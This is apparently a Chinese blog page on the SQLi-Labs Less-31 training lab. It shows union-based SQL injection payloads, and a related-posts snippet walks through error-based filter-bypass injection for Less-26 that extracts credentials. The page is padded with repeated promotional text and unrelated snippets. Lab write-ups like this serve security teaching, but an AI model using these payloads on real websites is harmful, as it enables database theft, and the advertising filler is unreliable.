SQLi LABS Less-31_sqli31(1)

最新推荐文章于 2024-06-18 11:48:36 发布
最新推荐文章于 2024-06-18 11:48:36 发布
阅读量1k 收藏 15
点赞数 24
分类专栏: 2024年程序员学习 文章标签: 网络安全 web安全 面试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2401_84266286/article/details/138990068
版权

学习路线:

这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。不过,要想从脚本小子变成黑客大神,这个方向越往后,需要学习和掌握的东西就会越来越多以下是网络渗透需要学习的内容:
在这里插入图片描述

需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

再输入 1") and false-- a,使SQL恒不成立,页面空显示

由此判断存在SQL注入,注入点为双引号+括号的字符型注入

页面有显示位,我们可以使用联合注入进行脱库

-1") union select 1,2,
(select group_concat(schema_name) from information_schema.schemata)
-- a

脱表

-1") union select 1,2,
(select group_concat(table_name) from information_schema.tables 
 where table_schema='security')
-- a

本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。

最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。

最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!下面就开始进入正题,如何从一个萌新一步一步进入网络安全行业。

需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)

学习路线图

其中最为瞩目也是最为基础的就是网络安全学习路线图,这里我给大家分享一份打磨了3个月,已经更新到4.0版本的网络安全学习路线图。

相比起繁琐的文字,还是生动的视频教程更加适合零基础的同学们学习,这里也是整理了一份与上述学习路线一一对应的网络安全视频教程。

网络安全工具箱

当然,当你入门之后,仅仅是视频教程已经不能满足你的需求了,你肯定需要学习各种工具的使用以及大量的实战项目,这里也分享一份我自己整理的网络安全入门工具以及使用教程和实战。

项目实战

最后就是项目实战,这里带来的是SRC资料&HW资料,毕竟实战是检验真理的唯一标准嘛~

面试题

归根结底,我们的最终目的都是为了就业,所以这份结合了多位朋友的亲身经验打磨的面试题合集你绝对不能错过!

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

SQLi LABS Less-20 Cookie注入
wangyuxiang946的博客
06-23 1万+
SQLi第二十关,sqllabs less-20,sqli-labs less20
SQLi LABS Less-7 布尔盲注_sqli靶场第七关使用盲注(1)
2301_82056337的博客
05-17 525
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。id=1)) and 0 – a,页面异常(空)显示。id=1)) and 1 – a,页面正常显示。判断成立,页面正常显示,文末使用Python脚本自动化判断。判断成立,页面正常显示,文末使用Python脚本自动化判断。获取 security 库的所有表。获取 users 表的所有字段。因篇幅有限,仅展示部分资料。
docker: Error response from daemon: unauthorized: incorrect username or password.
乞力马扎罗的雪CYF的博客
11-12 1万+
当我们在下载一个镜像过程中,可能会出现以下的问题:docker: Error response from daemon: Get https://registry-1.docker.io/v2/library/hello-world/manifests/latest: unauthorized: incorrect username or password.详细说明如下:只要Mac上的Docker
使用docker拉取镜像时,报Error response from daemon:unauthorized: incorrect username or password
ls18802694089的博客
06-18 1108
如果是使用默认的Docker Hub,则不需要指定。替换你的用户名、密码和仓库的URL。
2023年网络安全面试跳槽看这一篇就够了(含面试题+面经分享)_云网安产品技术开发与支持面经
2401_83739777的博客
04-17 463
一个人可以走的很快,但一群人才能走的更远!注:本套面试题及面经,已整理成pdf文档,但内容还在持续更新中,因为无论如何都不可能覆盖所有的面试问题,更多的还是希望由点达面,查漏补缺,希望对大家有帮助。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。以下为网络安全各个方向涉及的面试题以及安全大厂的面经汇总,星数越多代表问题出现的几率越大,祝各位都能找到满意的工作。又到了一年一度的金三银四面试季,想必有些朋友的心已经开始躁动了,毕竟跳槽涨薪的幅度远高于内部调薪的幅度!
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 1629
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
Cobalt strike加载插件出现乱码
qq_50854662的博客
03-04 1259
问题描述 插件 加载成功出现乱码 解决方法 在Cobalt strike目录下执行命令指定编码打开客户端解决。 java -Dfile.encoding=utf-8 -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -Xms512M -Xmx1024M -jar cobaltstrike.jar 1 成功解决
网络安全-sqlmap实战之sqlilabs-Less8_sqli-labs-master less-8 select from users where
2401_84254087的博客
05-02 160
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。添加–dbms参数,–technique参数。使用-o参数优化,–batch参数进行跳过。
网络安全-sqlmap实战之sqlilabs-Less11_less11的sql注入用sqlmap将数据库dump
2401_84248681的博客
04-29 317
错误回显sql语句猜测。
网络安全-sqlmap实战之sqlilabs-Less4_用kali中的sqlmap工具完成sqli-labs less-4
m0_54903333的博客
05-09 298
猜测sql语句。
docker报错-->Error response from daemon: Get xxx: unauthorized: incorrect username or password
热门推荐
Hitvz的博客
11-21 1万+
1、报错信息Error response from daemon: Get https://registry-1.docker.io/v2/wnameless/oracle-xe-11g/manifests/latest: unauthorized: incorrect username or password 这个报错实在pull镜像的时候发生的。2、解决方法其实这个报错,就是最简
实战-ApacheSuperset未授权访问漏洞(CVE-2023-27524)
Welcome To Myon'Blog !
01-19 2306
Apache Superset 是一个开源的现代数据探索和可视化平台Apache Superset 是一种广泛使用的数据可视化和探索开源工具,已被确定存在潜在的安全漏洞,可能导致身份验证绕过和远程代码执行 (RCE),这些漏洞可能使恶意行为者能够获得目标服务器上的管理权限,从而使他们能够收集用户凭据并可能危及数据。安装官方发布的升级修复补丁。
CTF盲水印工具:Blind-WaterMark安装
如有错误感谢斧正
02-01 6246
使用python3的程序对使用python2程序添加了水印的图片进行水印提取会导致算法错误。当然如果输出的图片没出现水印则可以删掉试试,可能是使用python3的工具添加的水印。opencv python-4.*.*:代表的是opencv的版本。最后的命令是因为现在大部分题目用的都是python2进行的水印加密。后面的cp310、cp39:代表的是python版本。如果你是python2版本,就运行第一行的命令。完成上面的步骤,依赖文件就算是安装完成了。接着挑选适合我的python版本的。
【CTF-misc】java盲水印BlindWatermark工具使用
qq_39972370的博客
10-31 5199
​ 盲水印是一种肉眼不可见的水印方式,对图片资源使用图片盲水印或者文字水印,借此避免数字媒体未经授权的复制和拷贝,可通过对原图进行解码操作,得到水印图来证明版权归属。 题目来源:NewStarCTF 2023 公开赛道 WEEK2|MISC:Jvav
cobalt strike安装插件出现中文乱码,无法使用更改编码命令解决.
laterw的博客
10-18 2141
原因: java.lang.ClassNotFoundException: /encoding=utf-8。cobalt strike加载脚本(插件)之后出现乱码问题.错误: 找不到或无法加载主类 .encoding=utf-8。打开,在另存为界面更改编码;
Apache Superset 会话验证漏洞可导致攻击者访问未授权资源
smellycat000的专栏
04-26 1212
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士今年年初早些时候,Apache Superset 中设置了不安全的默认配置,攻击者可借此登录并接管该数据可视化应用、窃取数据并执行恶意代码。该漏洞编号是CVE-2023-27524。Apache Superset 基于 Python 的Flash 框架,默认配置公开已知的密钥 SECRET_KEY = '\2\1thisismyscretkey\...
第四届区块链技术与信息安全国际会议(ICBCTIS 2024)_区块链会议2024(2)
2401_84247423的博客
05-09 467
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。薪资区间6k-15k。****区块链:****区块链、边缘计算、云计算、分布式计算、物联网、智能合约、链码、大数据和人工智能。③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
CTFshow-web-web5
qq_68581192的博客
10-09 238
不同数据的md5值一般不会相同,但是在php文件中,php在处理字符串时会把每一个以“0E”开头的哈希值都解释为0,当两个字符串的md5值都以0E开头时会被识别成科学计数法,会默认都为0,则是相同的。在这选的是v1=QNKCDZO,v2=240610708。我们可以看到源码,可以知道我们需要通过GET请求传递两个参数v1和v2,且v1需要是字母,v2是数字或字符串,两个参数的md5值还得相等。is_numeric()函数用于检测变量是否为数字或数字字符串,是则返回true,否则返回false。
ctfshow-web5
ElsonHY的博客
12-20 694
靶场地址:ctf.show 1.读代码 v1:参数要求为字母。 v2:参数要求为数字。 当v1和v2的MD5相同时,打印出flag的值。 2.md5碰撞 不同数据的md5是不会相等的,但是这边用的是==,如果得出的md5值是"0e"+"数字" 的格式,就会被当作科学计数法,值都为0。 举例: 只要找到对应格式的MD5值的全字母和全数字的值就可以了。 我用python写了一个自动化程序找出对应格式的md5值,只要修改对应的payload就可以了。 好家伙,这几率和买彩票一样,对应全数字和全字母一共跑了几个
sqlilabs less-26
最新发布
05-06
<think>好的,用户想要解决SQLiLabs Less-26的挑战,我需要先回顾一下这个关卡的特点。Less-26通常涉及绕过过滤机制,比如过滤空格、注释符或者某些关键词。根据提供的引用内容,之前的关卡如Less-36提到使用GBK编码绕过转义,而Less-1112和48使用了报错注入技术,比如extractvalue和updatexml函数。此外,Less-34涉及UTF编码的知识,可能与字符编码有关。 首先,我需要确认Less-26的具体过滤规则。根据经验,Less-26可能过滤了空格、注释符(如--+或#),可能还有某些关键字如union、select等。用户可能需要使用替代字符绕过过滤,比如用%a0代替空格,或者使用括号包裹注入语句。例如,使用报错注入时,需要确保闭合单引号,并绕过空格过滤。 接下来,构造注入语句。例如,爆库名时,可能需要用报错函数,结合concat和0x7e符号。同时,替换空格为%a0或使用括号。例如:'or(updatexml(1,concat(0x7e,(select database())),1))%26%26'a'='a。这里需要注意闭合原查询的单引号,并使用逻辑运算符绕过过滤。 另外,考虑字符编码的问题,可能需要调整字符集,如GBK,但根据引用[1],这需要设置正确的字符集。不过Less-26是否涉及字符集绕过还不确定,可能需要结合其他方法。 用户可能需要逐步测试过滤的字符,尝试不同的替代方法,比如使用双重编码或特定符号代替空格。同时,确保注入语句的正确闭合,避免语法错误。在获取表名和字段名时,需要利用information_schema,并处理可能的过滤,例如将users表名用十六进制表示,避免单引号被过滤。 最后,总结步骤,帮助用户理解每个注入步骤的目的和方法,并提供相关问题以深化理解,如如何绕过其他过滤,替代空格的其他方法,以及报错注入的其他函数。</think>### SQLi-Labs Less-26 解决方案 #### 一、关卡特性分析 Less-26 是 SQLi-Labs 中针对**过滤空格和注释符**的注入挑战。主要过滤以下内容: 1. 空格(包括普通空格、`%20`、`+`) 2. 注释符(`--+`、`#`) 3. 部分关键词(如`union select`可能被拆分会失效) 引用示例中的报错注入技术[^2][^3]在此关卡仍适用,但需要绕过过滤规则。 --- #### 二、绕过过滤的核心方法 1. **替代空格的字符**: - `%a0`(URL 编码的不可见字符) - 使用括号`()`包裹语句 - 例如:`select(schema_name)from(information_schema.schemata)` 2. **绕过注释符**: - 通过逻辑运算符闭合语句,如 `'||'1'='1` 或 `'&&'1'='1` 3. **关键词拆分绕过**: - 使用双写、大小写混合或插入特殊符号(如`uni%a0on sele%a0ct`) --- #### 三、分步骤注入流程 ##### 1. 判断注入点 输入测试载荷: ```sql '||'1'='1 ``` 若返回正常页面,说明存在字符型注入。 ##### 2. 爆数据库名 使用报错注入函数`updatexml`,替代空格为`%a0`: ```sql 'or(updatexml(1,concat(0x7e,(select%a0database())),1))%26%26'a'='a ``` - `%26%26` 是 `&&` 的 URL 编码 - 输出示例:`XPATH syntax error: '~security'` → 数据库名为 `security`[^3] ##### 3. 爆表名 ```sql 'or(updatexml(1,concat(0x7e,(select%a0group_concat(table_name)%a0from%a0information_schema.tables%a0where%a0table_schema=database())),1))%26%26'a'='a ``` 输出示例:`~emails,referers,uagents,users` ##### 4. 爆字段名(以 `users` 表为例) ```sql 'or(updatexml(1,concat(0x7e,(select%a0group_concat(column_name)%a0from%a0information_schema.columns%a0where%a0table_name='users')),1))%26%26'a'='a ``` 输出示例:`~id,username,password` ##### 5. 提取数据 ```sql 'or(updatexml(1,concat(0x7e,(select%a0group_concat(username,0x3a,password)%a0from%a0users)),1))%26%26'a'='a ``` 输出示例:`~Dumb:Dumb,Angelina:...` --- #### 四、防御措施(参考引用[^1]) 若开发中需防范此类攻击: 1. 使用 `mysql_real_escape_string()` 前设置字符集为 `gbk`: ```php mysql_set_charset('gbk', $conn); ``` 2. 使用预编译语句(PDO/MySQLi---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值